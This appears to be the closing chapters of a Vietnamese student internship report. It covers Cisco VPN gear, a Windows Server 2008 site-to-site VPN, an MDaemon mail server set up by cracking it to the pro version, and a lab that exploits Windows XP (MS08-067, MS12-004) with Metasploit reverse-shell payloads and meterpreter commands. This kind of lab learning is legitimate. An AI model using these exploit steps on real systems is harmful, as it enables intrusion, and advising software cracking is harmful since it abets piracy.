Tùy vào loại VPN (truy cập từ xa hay điểm-nối-điểm), bạn sẽ cần phải cài

đặt những bộ phận hợp thành nào đó để thiết lập mạng riêng ảo. Đó có thể là:

- Phần mềm cho desktop của máy khách dành cho người sử dụng từ xa.

- Phần cứng cao cấp như bộ xử lý trung tâm VPN hoặc firewall bảo mật PIX.

- Server VPN cao cấp dành cho dịch vụ Dial-up.

- NAS (máy chủ truy cập mạng) do nhà cung cấp sử dụng để phục vụ người

sử dụng từ xa.

- Mạng VPN và trung tâm quản lý.

Bộ xử lý trung tâm VPN

Có nhiều loại máy xử lý VPN của các hãng khác nhau, nhưng sản phẩm của

Cisco tỏ ra vượt trội ở một số tính năng. Tích hợp các kỹ thuật mã hóa và thẩm định

quyền truy cập cao cấp nhất hiện nay, máy xử lý VPN được thiết kế chuyên biệt cho

loại mạng này. Chúng chứa các module xử lý mã hóa SEP, cho phép người sử dụng

dễ dàng tăng dung lượng và số lượng gói tin truyền tải. Dòng sản phẩm có các

model thích hợp cho các mô hình doanh nghiệp từ nhỏ đến lớn (từ100 cho đến

10.000 điểm kết nối từ xa truy cập cùng lúc).


Router dùng cho VPN

Thiết bị này cung cấp các tính năng truyền dẫn, bảo mật. Dựa trên hệ điều

hành Internet IOS của mình, hãng Cisco phát triển loại router thích hợp cho mọi

trường hợp, từ truy cập nhà-tới-văn phòng cho đến nhu cầu của các doanh nghiệp

quy mô lớn.

Tường lửa PIX của Cisco

Firewall trao đổi Internet riêng (Private Internet Exchange) bao gồm một cơ

chế dịch địa chỉ mạng rất mạnh, máy chủ proxy, bộ lọc gói tin, các tính năng VPN

và chặn truy cập bất hợp pháp.

Thay vì dùng IOS, thiết bị này có hệ điều hành với khả năng tổ chức cao,

xoay sở được với nhiều giao thức, hoạt động rất mạnh bằng cách tập trung vào IP.

4. VPN SITE TO SITE

Chuẩn bị:

- 2 windows server 2008

- 2 windows XP

+Máy PC 1 windows XP có ip 192.168.1.2. máy này sẻ ping thông với PC 2

là windows server 2008 có địa chỉ ip là 192.168.1.1.


+Máy PC 3 windows XP có ip 192.168.2.2 máy này sẻ ping thông với PC 4

là windows server 2008 có địa chỉ ip là 192.168.2.1.

Đặt IP cho 4 máy

Card Lan Card Cross

Server 1 10.0.0.1/24 192.168.1.1/24

Server 2 172.16.1.1/24 192.168.1.2/24

Client 1 10.0.0.2/24

Client 2 172.16.1.2/24

Tạo user saigon trên máy server 1

Tạo user hanoi trên máy server 2

Tiến hành cấu hình trên 2 server

Chọn properties ->chọn tab dial – in -> check chọn allow access


Trên máy server1

Vào server manager ->add roles


Chọn network policy and access services -> next

Chọn routing and remote access services -> next

Như vậy là đã cài xong giờ đi cấu hình


Vào start -> administrative ->routing and remote access

Chọn server -> click phải configure


Chọn Custom configuration -> next


Chọn VPN access + Demand – dial connections + Lan routing -> next

Chọn start service


Chọn tab Network interface -> click phải chọn new demand-dial interface

Nhập interface name : saigon -> next


Check connect using vitual private networking (VPN) ->next

Check chọn point to point -> next


Nhập địa chỉ ip card CROSS của máy server2 -> next

Check chọn route ip + adda user account


Add static route 172.16.2.0 (đường mạng LAN của máy server2) -> next

Nhập password của user saigon mình đã tạo ban đầu -> next


Nhập user name :hanoi

Password của user hanoi mình đã tạo ban đầu -> next

Chọn properties server


Chọn tab IPv4 và add vào chuỗi địa chỉ ip sẽ nhận khi connect vào

Apply + OK


Properties network interface saigon vừa tạo

Chọn tab L2Tp ipsec VPN và nhập key


Properties server chọn tab security -> check chọn allow custom IP sec policy

for L2TP connection -> Apply -> OK

Click phải network interface saigon ở server1 -> chọn connect

Click phải network interface hanoi ở server2 -> chọn connect


Xem kết quả connected rồi qua máy client 1 ping máy client 2 và ngược lại

để xem kết quả

Kiểm tra.

Lúc này từ PC1 sẻ ping thông qua PC4.


5. DỊCH VỤ MAIL SERVER MDaemon

Cấu hình MDmoon v10.

Đăng ký Domain

Ta truy cập vào dot.tk để đăng ký domain

Click “Đăng nhập vào My Dot” để tùy chỉnh các thông số cho domain

Cuối cùng là Save Changes.

Mail Server Mdaemon

Định Nghĩa:

Mail Server là một máy chủ cung cấp dịch vụ viết gửi và nhận thư trên

internet.

Để tạo 1 mail server thì có nhiều phần mềm , nhưng nổi tiếng nhất đó là

Mdaemon.

Các bước chuẩn bị:

1VPS làm Mail Server


Phần mềm Mdaemon bản pro

1 Domain đã add record (MX record).

Tiến hành:

Trên máy VPS ta cài Mdaemon và crack thành bản pro (vì bản pro mới cho

phép gởi và nhận mail từ các dịch vụ mail khác, con bản free chỉ cho gửi mail nội

bộ)

Cách cài Mdaemon Pro:

Ta chạy file setup MDv10.exe

Đợi quá trình cài đặt hoàn tất

Điền domain (mà ta đã đang ký ở dot.tk lúc nãy vào) Domain name


Điền vào tên và địa chỉ mail cũng như mật khẩu cho tài khoảng admin

Điền vào IP của VPS :


Click Next

Ta khỏi động Mdaemon lên rồi tạo User mail

Ta vào Account>>New Account để tạo users


Ta tạo User :


Đăng nhập vào tài khoản

Gửi mail đến Gmail để kiểm tra


Đăng nhập vào Gmail kiểm tra

Đăng nhập vào mail nội bộ và nhận mail

Kết thúc mail mdeamon


CHƯƠNG 6: BẢO MẬT WINDOWS.

1. Khai thác lỗ hổng trên Windows XP với mã lỗi MS08_067

Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy

tấn công nạn nhân)

Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là:

192.168.154.128

Các bước thực hiện:

Kiểm tra mạng giữa XP và máy Back Track 5r3:

Máy Back Track 5r3:

Máy Xp:


Kiểm tra thông mạng:

Trên máy Back track 5r3 ta gõ đường dẫn: cd /pentest/exploits/framework


Ta tiếp tục gõ lệnh:

./msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129

LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp

Trong đó RHOST là IP máy Xp, LHOST là IP máy Back track 5r3.

Sau đó, ta chờ cho máy Back track 5r3 tấn công Xp

Cuối cùng ta đã tấn công được Xp, ta biết được các thông số của máy XP


2. Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004

Máy Backtrack 5r3 có IP là 192.168.1.2, máy xp có IP là 192.168.1.3

Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole

Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004


Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.

Dùng lệnh show options để biết thêm các câu lệnh cần thiết.


Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>

Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp

Dùng lệnh set LHOST <ip backtrack>


Dùng lệnh exploit để tiến hành khai thác lỗi.

Chú ý đường dẫn http://192.168.1.2:8080/nếu máy nạn nhân vào đường dẫn

này sẽ bị hack.

Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy

XP là 192.168.1.3

Trên máy XP ta vào trình duyệt web và gõ đường

dẫnhttp://192.168.1.2:8080/


http://192.168.147.130:80/

http://192.168.147.130:80/

Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ

Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó.

Trên máy back track ta gõ lệnh sessions để kiểm tra.


Dùng lệnh sessions –i 1

Xem trước thông tin XP:


Trên máy backtrack gõ getuid để biết thông tin máy Xp, và tài khoản đang

truy cập.

Gõ sysinfo để biết thông tin chi tiết máy Xp:

Gõ lệnh shell để vào ổ đĩa máy XP:

Giờ thì ta có thể xem được các file trong ổ đĩa của máy XP.


1.

KẾT LUẬN

Các kết quả đạt được:

Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em

đã có kiến thức về:

- Nguyên lý cơ bản của hệ điều hành mạng, kiến thức về hệ thống mạng, có

kỹ năng cần thiết để cài đặt, cấu hình hoàn chỉnh mạng doanh nghiệp cỡ vừa và lớn

dựa vào Windows Server 2008.

- Hiểu về cấu trúc hạ tầng, thiết kế và quản trị hệ thống mạng, nhiệm vụ quản

lý bao gồm việc điều hành và hỗ trợ hệ thống.

- Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống

mạng.

- Có các kiến thức trên nền tảng công nghệ Windows Server 2008.

Kinh nghiệm thực tế

- Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của một

doanh nghiệp thông qua nền tảng.

- Được trực tiếp tiếp xúc những công nghệ và thiết bị mà trước đây chỉ biết

đến thông qua sách vở.

- Được vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.

- Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học trên

lớp.

- Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.

- Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.

Hoàn thiện bản thân

- Các thành viên trong nhóm đã định hướng rõ ràng mục tiêu sắp tới sẽ làm.

- Tự tin hơn trong việc giao tiếp với mọi người trong công việc.

- Nâng cao khả năng làm việc nhóm cũng như khả năng tự bản thân giải

quyết vấn đề khó khăn gặp phải trong công việc.


Các kiến thức được lĩnh hội

- Kiến thức thực tế về hệ thống mạng của doanh nghiệp.

- Hiểu các thành phần công nghệ mạng doanh nghiệp vừa và nhỏ.

Kết luận.

Nhìn chung các công việc em đã cơ bản hoàn thành, tuy nhiên sẽ còn nhiều

thiếu sót, đa phần là quá trình tự học. Vì thế mong Thầy cô, các bạn đánh giá và đưa

ra những ý kiến đóng góp để khắc phục và sửa chữa. Bên cạnh trình độ chuyên môn

cũng cần có những kỹ năng mềm như kỹ năng giao tiếp, làm việc nhóm cũng hết

sức quan trọng. Thực tập là giai đoạn quan trọng của sinh viên, giúp sinh viên có cơ

hội làm việc thực tế nhằm củng cố kĩ năng, chuẩn bị cho giai đoạn làm việc thật sau

khi tốt nghiệp.

Trong quá trình thực tập tại Trung tâm ATHENA, nhóm chúng em được tiếp

xúc với một môi trường làm việc chuyên nghiệp, các công nghệ, thiết bị,các mô

hình thực tế... Qua đó nhóm học hỏi được những kinh nghiệm nhất định và có

những suy nghĩ đóng góp sau:

Về công việc: Để thiết kế và triển khai một hệ thống mạng cho một công

ty, cần có nhiều bộ phận phối hợp với nhau để thực hiện và hoàn thành dự án.

Về phát triển kỹ năng:Để các bộ phận có thể phối hợp tốt mỗi nhân viên

cần có những kỹ năng cơ bản để làm việc trong đội, nhóm:

oLàm việc nhóm: Kỹ năng làm việc nhóm là khả năng làm việc hiệu quả

trong đội ngũ. Đó là việc có thể sử dụng đúng người để có được kết quả tốt nhất và

luôn sẵn sàng để có thể lãnh đạo hoặc phối hợp làm theo.

oTìm hiểu – thu thập thông tin: Quản lý thông tin là khả năng biết được nơi

để có được thông tin cần thiết - để tìm kiếm, định vị, và thu thập nó. Điều này có thể

liên quan đến việc sử dụng các nguồn lực khác nhau, cho dù chúng là từ những con

người hoặc từ các tài liệu trong thế giới rộng lớn của công nghệ

oKỹ năng giải quyết vấn đề - Tính linh hoạt : Tính linh hoạt là khả năng

thích nghi để giải quyết công việc chúng ta gặp phải hàng ngày trong công việc lẫn


đời sống riêng. Giải quyết vấn đề là xác định vấn đề, nghiên cứu giải pháp và đưa ra

những quyết định hiệu quả.

Về công nghệ: với lợi thế là công ty hoạt động trong lĩnh vực công nghệ

thông tin, ATHENA có hạ tầng CNTT hiện đại ,an toàn và thông suốt .

Danh sách các file upload trên youtube

Cài đặt Windows server 2008

https://www.youtube.com/watch?v=te3X4Mce-Q4

Cấu hình DHCP

https://www.youtube.com/watch?v=OnoGfLSetfc

Cấu hình DNS

https://www.youtube.com/watch?v=IPm0ZyZC8w4

Cấu hình VPN

https://www.youtube.com/watch?v=f1CQxBKU-4g

Cấu hình IIS

https://www.youtube.com/watch?v=R9Q-sKx0yaQ

Dịch vụ mail trên VPS

https://www.youtube.com/watch?v=Q0kSI6NNuvU

DOMAIN

https://www.youtube.com/watch?v=q-Dz_SNu6Ls


https://www.youtube.com/watch?v=q-Dz_SNu6Ls

https://www.youtube.com/watch?v=Q0kSI6NNuvU

https://www.youtube.com/watch?v=R9Q-sKx0yaQ

https://www.youtube.com/watch?v=f1CQxBKU-4g

https://www.youtube.com/watch?v=IPm0ZyZC8w4

https://www.youtube.com/watch?v=OnoGfLSetfc

https://www.youtube.com/watch?v=te3X4Mce-Q4

bao cao-thuc-tap

Documents